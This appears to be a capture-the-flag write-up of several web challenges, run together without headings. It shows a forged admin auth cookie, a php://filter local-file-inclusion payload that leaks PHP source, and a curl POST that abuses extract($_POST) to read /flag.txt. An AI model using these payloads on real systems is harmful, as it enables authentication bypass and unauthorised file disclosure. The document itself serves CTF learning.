Change your User-Agent to the Windows 95 profile and you see the flag.

Going to /robots.txt reveals the server source code, along with some authentication checks.

We didn't really do this the intended way.

Set the auth cookie to

auth=7b2275736572223a202261646d696e222c202270617373776f7264223a202270617373222c202261646d696e223a20747275652c2022646967657374223a2022686173686c69622e736861353132287365637265745f6b6579202b206279746573286a736f6e2e64756d707328636f6f6b69652c20736f72745f6b6579733d54727565292c205c2261736369695c2229292e6865786469676573742829227d

which is the encoded form of

{'user': 'admin', 'password': 'pass', 'admin': True, 'digest': 'hashlib.sha512(secret_key + bytes(json.dumps(cookie, sort_keys=True), "ascii")).hexdigest()'}

This makes the SHA512 comparison always true, allowing you to log in as the admin.

Visiting the site, you can see that the location phphonebook.php is referenced, however visiting the url as suggested (/index.php/?file=phphonebook.php ) it returns a blank page.

However, there is a trick to get around this - if you add a php filter on it so it encodes the content to base64 as demonstrated below: /index.php/?file=php://filter/convert.base64-encode/resource=phphonebook.php

This returns the source code which contains a very interesting piece of php.

extract($_POST);

if (isset($emergency)){
    echo(file_get_contents("/flag.txt"));
}

This essentially means, if there is a variable in the POST request named emergency, it will retrieve the contents of /flag.txt. We did this in two ways, with BurpSuite and with curl, but the curl request was much more simple, all was needed was: curl -X POST 'http://jh2i.com:50002/index.php/?file=phphonebook.php' -d 'emergency=999' | grep flag

Voila, the flag is returned. A relatively simple challenge, but it was definitely interesting to learn about the base64 filter.

Take apart the javascript.

In there there is a reference to flag with some base64 next to it.

Decoding the base64 gives us the flag.